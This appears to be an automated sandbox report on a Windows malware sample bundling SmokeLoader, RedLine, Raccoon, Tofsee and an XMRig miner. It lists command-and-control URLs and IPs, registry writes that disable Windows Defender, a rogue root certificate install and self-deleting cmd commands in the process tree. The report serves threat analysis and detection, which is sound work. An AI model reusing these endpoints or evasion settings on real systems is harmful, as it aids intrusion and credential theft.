gozi_rm3 | e01749cfd587ae7029247ef900df2eb0e89e2fc594ca665d460a73bfa9564647

Analysis

max time kernel
63s
max time network
199s
platform
windows7_x64
resource
win7v20210408
submitted
29-09-2021 14:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

438215ec552fef4a43a10c331d658c04.exe
Size

128KB
MD5

438215ec552fef4a43a10c331d658c04
SHA1

a4941168e1269993b195b84fa272870c58bd6c10
SHA256

e01749cfd587ae7029247ef900df2eb0e89e2fc594ca665d460a73bfa9564647
SHA512

a3da5a1969e2166e3c0091c749f171c7c8ac915fe12873fce81af7d4f3fc5fab609f3b5cefbafde4b617fa4c64745b7a7e50d6194acfb1850c13b8e13accf302

Score

10^/10

gozi_rm3 raccoon redline smokeloader tofsee xmrig 5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4 5k superstar 777777 backdoor banker discovery evasion infostealer miner persistence spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/

rc4.i32

Extracted

Family

redline

92.246.89.6:38437

Extracted

Family

redline

Botnet

777777

193.56.146.60:18243

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes

url4cnc
https://t.me/agrybirdsgamerept

rc4.plain

Extracted

Family

redline

Botnet

5k superstar

narlelalik.xyz:12509

Signatures

Gozi RM3
A heavily modified version of Gozi using RM3 loader.
banker trojan gozi_rm3
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 8 IoCs

resource	yara_rule
behavioral1/memory/1680-79-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/1680-80-0x000000000041C5BA-mapping.dmp	family_redline
behavioral1/memory/1680-82-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/1976-175-0x000000000041C5D2-mapping.dmp	family_redline
behavioral1/memory/1976-173-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/1976-178-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/972-220-0x00000000004A0000-0x00000000004BF000-memory.dmp	family_redline
behavioral1/memory/972-222-0x0000000001FB0000-0x0000000001FCE000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Nirsoft 7 IoCs

resource	yara_rule
behavioral1/files/0x00050000000130dd-135.dat	Nirsoft
behavioral1/files/0x00050000000130dd-136.dat	Nirsoft
behavioral1/files/0x00050000000130dd-139.dat	Nirsoft
behavioral1/files/0x00050000000130dd-144.dat	Nirsoft
behavioral1/files/0x00050000000130dd-145.dat	Nirsoft
behavioral1/files/0x00050000000130dd-147.dat	Nirsoft
behavioral1/files/0x00050000000130dd-151.dat	Nirsoft

XMRig Miner Payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/2648-263-0x00000000001F259C-mapping.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
56	372	msiexec.exe
62	1304	msiexec.exe

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 18 IoCs

pid	Process
528	B3B4.exe
1536	B3B4.exe
1712	BC9B.exe
1680	BC9B.exe
1516	DAB6.exe
1092	EBC7.exe
664	F4EC.exe
528	DAB6.exe
1904	ubecddth.exe
1476	AdvancedRun.exe
1992	1134.exe
1336	AdvancedRun.exe
1904	1E30.exe
1728	F4EC.exe
1008	F4EC.exe
1976	F4EC.exe
972	2A70.exe
2284	3D26.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Deletes itself 1 IoCs

pid	Process
1220	Process not Found

Loads dropped DLL 64 IoCs

pid	Process
528	B3B4.exe
1712	BC9B.exe
1516	DAB6.exe
664	F4EC.exe
664	F4EC.exe
1476	AdvancedRun.exe
1476	AdvancedRun.exe
1992	1134.exe
1992	1134.exe
1964	MsiExec.exe
1964	MsiExec.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
1420	MsiExec.exe
1420	MsiExec.exe
1420	MsiExec.exe
1420	MsiExec.exe
1420	MsiExec.exe
1992	1134.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe
528	DAB6.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	F4EC.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\F4EC.exe = "0"	F4EC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection	F4EC.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	F4EC.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	F4EC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	F4EC.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	F4EC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	F4EC.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\M:	1134.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	1134.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	1134.exe
File opened (read-only)	\??\T:	1134.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	1134.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\F:	1134.exe
File opened (read-only)	\??\G:	1134.exe
File opened (read-only)	\??\S:	1134.exe
File opened (read-only)	\??\W:	1134.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\V:	1134.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	1134.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	1134.exe
File opened (read-only)	\??\R:	1134.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	1134.exe
File opened (read-only)	\??\H:	1134.exe
File opened (read-only)	\??\L:	1134.exe
File opened (read-only)	\??\Q:	1134.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	1134.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Y:	1134.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	1134.exe
File opened (read-only)	\??\J:	1134.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
69	icanhazip.com
29	ipapi.co
30	ipapi.co
46	ipapi.co
64	api.ipify.org
65	api.ipify.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs

pid	Process
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe
664	F4EC.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2000 set thread context of 524	2000	438215ec552fef4a43a10c331d658c04.exe	27
PID 528 set thread context of 1536	528	B3B4.exe	29
PID 1712 set thread context of 1680	1712	BC9B.exe	32
PID 1904 set thread context of 2028	1904	ubecddth.exe	57
PID 664 set thread context of 1976	664	F4EC.exe	69

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Installer\32818.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2BD4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI346F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI412D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\32818.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3029.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI321D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3605.tmp	msiexec.exe
File created	C:\Windows\Installer\3281a.ipi	msiexec.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	438215ec552fef4a43a10c331d658c04.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	438215ec552fef4a43a10c331d658c04.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	438215ec552fef4a43a10c331d658c04.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B3B4.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B3B4.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B3B4.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Buses	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = e43b583d78bc5a0424edb47d450dd49d084297dce82e72baa4823cfd547d5c1d15ec7d7a87cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814db834d753becaa644490bdb77f20e4975806c8f78d3c74bbc4103d29faa46d13d985497335d4f10b4c90d8f6127db9a45b3494b48d662fd69a430f32fea05d579fc2223064b9f86400c68cb07d21e4905805ccc4e13b7e85c12b496da0f15d15d8844b733de5ab5d1ff459a44014a1d5a36dfdc48d541ce4ad744a6bbfff02579fc27d440dd49d642df4ccd8c16098a46d34fdc741461ee4ad743c35f4a77311db9a4c703bfaac5c15f4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743de1cc945d	svchost.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	1134.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	1134.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2392	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
524	438215ec552fef4a43a10c331d658c04.exe
524	438215ec552fef4a43a10c331d658c04.exe
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
524	438215ec552fef4a43a10c331d658c04.exe
1536	B3B4.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1220	Process not Found
Token: SeShutdownPrivilege	1220	Process not Found
Token: SeShutdownPrivilege	1220	Process not Found
Token: SeDebugPrivilege	1516	DAB6.exe
Token: SeDebugPrivilege	1680	BC9B.exe
Token: SeDebugPrivilege	664	F4EC.exe
Token: SeDebugPrivilege	528	DAB6.exe
Token: SeDebugPrivilege	1476	AdvancedRun.exe
Token: SeImpersonatePrivilege	1476	AdvancedRun.exe
Token: SeDebugPrivilege	1336	AdvancedRun.exe
Token: SeImpersonatePrivilege	1336	AdvancedRun.exe
Token: SeRestorePrivilege	1304	msiexec.exe
Token: SeTakeOwnershipPrivilege	1304	msiexec.exe
Token: SeSecurityPrivilege	1304	msiexec.exe
Token: SeCreateTokenPrivilege	1992	1134.exe
Token: SeAssignPrimaryTokenPrivilege	1992	1134.exe
Token: SeLockMemoryPrivilege	1992	1134.exe
Token: SeIncreaseQuotaPrivilege	1992	1134.exe
Token: SeMachineAccountPrivilege	1992	1134.exe
Token: SeTcbPrivilege	1992	1134.exe
Token: SeSecurityPrivilege	1992	1134.exe
Token: SeTakeOwnershipPrivilege	1992	1134.exe
Token: SeLoadDriverPrivilege	1992	1134.exe
Token: SeSystemProfilePrivilege	1992	1134.exe
Token: SeSystemtimePrivilege	1992	1134.exe
Token: SeProfSingleProcessPrivilege	1992	1134.exe
Token: SeIncBasePriorityPrivilege	1992	1134.exe
Token: SeCreatePagefilePrivilege	1992	1134.exe
Token: SeCreatePermanentPrivilege	1992	1134.exe
Token: SeBackupPrivilege	1992	1134.exe
Token: SeRestorePrivilege	1992	1134.exe
Token: SeShutdownPrivilege	1992	1134.exe
Token: SeDebugPrivilege	1992	1134.exe
Token: SeAuditPrivilege	1992	1134.exe
Token: SeSystemEnvironmentPrivilege	1992	1134.exe
Token: SeChangeNotifyPrivilege	1992	1134.exe
Token: SeRemoteShutdownPrivilege	1992	1134.exe
Token: SeUndockPrivilege	1992	1134.exe
Token: SeSyncAgentPrivilege	1992	1134.exe
Token: SeEnableDelegationPrivilege	1992	1134.exe
Token: SeManageVolumePrivilege	1992	1134.exe
Token: SeImpersonatePrivilege	1992	1134.exe
Token: SeCreateGlobalPrivilege	1992	1134.exe
Token: SeCreateTokenPrivilege	1992	1134.exe
Token: SeAssignPrimaryTokenPrivilege	1992	1134.exe
Token: SeLockMemoryPrivilege	1992	1134.exe
Token: SeIncreaseQuotaPrivilege	1992	1134.exe
Token: SeMachineAccountPrivilege	1992	1134.exe
Token: SeTcbPrivilege	1992	1134.exe
Token: SeSecurityPrivilege	1992	1134.exe
Token: SeTakeOwnershipPrivilege	1992	1134.exe
Token: SeLoadDriverPrivilege	1992	1134.exe
Token: SeSystemProfilePrivilege	1992	1134.exe
Token: SeSystemtimePrivilege	1992	1134.exe
Token: SeProfSingleProcessPrivilege	1992	1134.exe
Token: SeIncBasePriorityPrivilege	1992	1134.exe
Token: SeCreatePagefilePrivilege	1992	1134.exe
Token: SeCreatePermanentPrivilege	1992	1134.exe
Token: SeBackupPrivilege	1992	1134.exe
Token: SeRestorePrivilege	1992	1134.exe
Token: SeShutdownPrivilege	1992	1134.exe
Token: SeDebugPrivilege	1992	1134.exe
Token: SeAuditPrivilege	1992	1134.exe
Token: SeSystemEnvironmentPrivilege	1992	1134.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found
372	msiexec.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1220	Process not Found
1220	Process not Found
1220	Process not Found
1220	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 524	2000	438215ec552fef4a43a10c331d658c04.exe	27
PID 2000 wrote to memory of 524	2000	438215ec552fef4a43a10c331d658c04.exe	27
PID 2000 wrote to memory of 524	2000	438215ec552fef4a43a10c331d658c04.exe	27
PID 2000 wrote to memory of 524	2000	438215ec552fef4a43a10c331d658c04.exe	27
PID 2000 wrote to memory of 524	2000	438215ec552fef4a43a10c331d658c04.exe	27
PID 2000 wrote to memory of 524	2000	438215ec552fef4a43a10c331d658c04.exe	27
PID 2000 wrote to memory of 524	2000	438215ec552fef4a43a10c331d658c04.exe	27
PID 1220 wrote to memory of 528	1220	Process not Found	28
PID 1220 wrote to memory of 528	1220	Process not Found	28
PID 1220 wrote to memory of 528	1220	Process not Found	28
PID 1220 wrote to memory of 528	1220	Process not Found	28
PID 528 wrote to memory of 1536	528	B3B4.exe	29
PID 528 wrote to memory of 1536	528	B3B4.exe	29
PID 528 wrote to memory of 1536	528	B3B4.exe	29
PID 528 wrote to memory of 1536	528	B3B4.exe	29
PID 528 wrote to memory of 1536	528	B3B4.exe	29
PID 528 wrote to memory of 1536	528	B3B4.exe	29
PID 528 wrote to memory of 1536	528	B3B4.exe	29
PID 1220 wrote to memory of 1712	1220	Process not Found	30
PID 1220 wrote to memory of 1712	1220	Process not Found	30
PID 1220 wrote to memory of 1712	1220	Process not Found	30
PID 1220 wrote to memory of 1712	1220	Process not Found	30
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1712 wrote to memory of 1680	1712	BC9B.exe	32
PID 1220 wrote to memory of 1516	1220	Process not Found	33
PID 1220 wrote to memory of 1516	1220	Process not Found	33
PID 1220 wrote to memory of 1516	1220	Process not Found	33
PID 1220 wrote to memory of 1516	1220	Process not Found	33
PID 1220 wrote to memory of 1092	1220	Process not Found	35
PID 1220 wrote to memory of 1092	1220	Process not Found	35
PID 1220 wrote to memory of 1092	1220	Process not Found	35
PID 1220 wrote to memory of 1092	1220	Process not Found	35
PID 1220 wrote to memory of 664	1220	Process not Found	36
PID 1220 wrote to memory of 664	1220	Process not Found	36
PID 1220 wrote to memory of 664	1220	Process not Found	36
PID 1220 wrote to memory of 664	1220	Process not Found	36
PID 1092 wrote to memory of 628	1092	EBC7.exe	37
PID 1092 wrote to memory of 628	1092	EBC7.exe	37
PID 1092 wrote to memory of 628	1092	EBC7.exe	37
PID 1092 wrote to memory of 628	1092	EBC7.exe	37
PID 1516 wrote to memory of 528	1516	DAB6.exe	39
PID 1516 wrote to memory of 528	1516	DAB6.exe	39
PID 1516 wrote to memory of 528	1516	DAB6.exe	39
PID 1516 wrote to memory of 528	1516	DAB6.exe	39
PID 1516 wrote to memory of 1948	1516	DAB6.exe	40
PID 1516 wrote to memory of 1948	1516	DAB6.exe	40
PID 1516 wrote to memory of 1948	1516	DAB6.exe	40
PID 1516 wrote to memory of 1948	1516	DAB6.exe	40
PID 1948 wrote to memory of 1412	1948	cmd.exe	42
PID 1948 wrote to memory of 1412	1948	cmd.exe	42
PID 1948 wrote to memory of 1412	1948	cmd.exe	42
PID 1948 wrote to memory of 1412	1948	cmd.exe	42
PID 1092 wrote to memory of 548	1092	EBC7.exe	43
PID 1092 wrote to memory of 548	1092	EBC7.exe	43
PID 1092 wrote to memory of 548	1092	EBC7.exe	43
PID 1092 wrote to memory of 548	1092	EBC7.exe	43
PID 1092 wrote to memory of 968	1092	EBC7.exe	45

C:\Users\Admin\AppData\Local\Temp\438215ec552fef4a43a10c331d658c04.exe
"C:\Users\Admin\AppData\Local\Temp\438215ec552fef4a43a10c331d658c04.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Users\Admin\AppData\Local\Temp\438215ec552fef4a43a10c331d658c04.exe
  "C:\Users\Admin\AppData\Local\Temp\438215ec552fef4a43a10c331d658c04.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:524

C:\Users\Admin\AppData\Local\Temp\B3B4.exe
C:\Users\Admin\AppData\Local\Temp\B3B4.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:528
- C:\Users\Admin\AppData\Local\Temp\B3B4.exe
  C:\Users\Admin\AppData\Local\Temp\B3B4.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1536

C:\Users\Admin\AppData\Local\Temp\BC9B.exe
C:\Users\Admin\AppData\Local\Temp\BC9B.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Users\Admin\AppData\Local\Temp\BC9B.exe
  C:\Users\Admin\AppData\Local\Temp\BC9B.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1680

C:\Users\Admin\AppData\Local\Temp\DAB6.exe
C:\Users\Admin\AppData\Local\Temp\DAB6.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Users\Admin\AppData\Roaming\DAB6.exe
  "C:\Users\Admin\AppData\Roaming\DAB6.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:528
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Self.bat" "
    3⤵
    PID:2264
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\DAB6.exe
    3⤵
    PID:2416
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:2480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Self.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\SysWOW64\chcp.com
    chcp 1251
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del DAB6.exe
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 0
    3⤵
    PID:1616

C:\Users\Admin\AppData\Local\Temp\EBC7.exe
C:\Users\Admin\AppData\Local\Temp\EBC7.exe
1⤵
- Executes dropped EXE
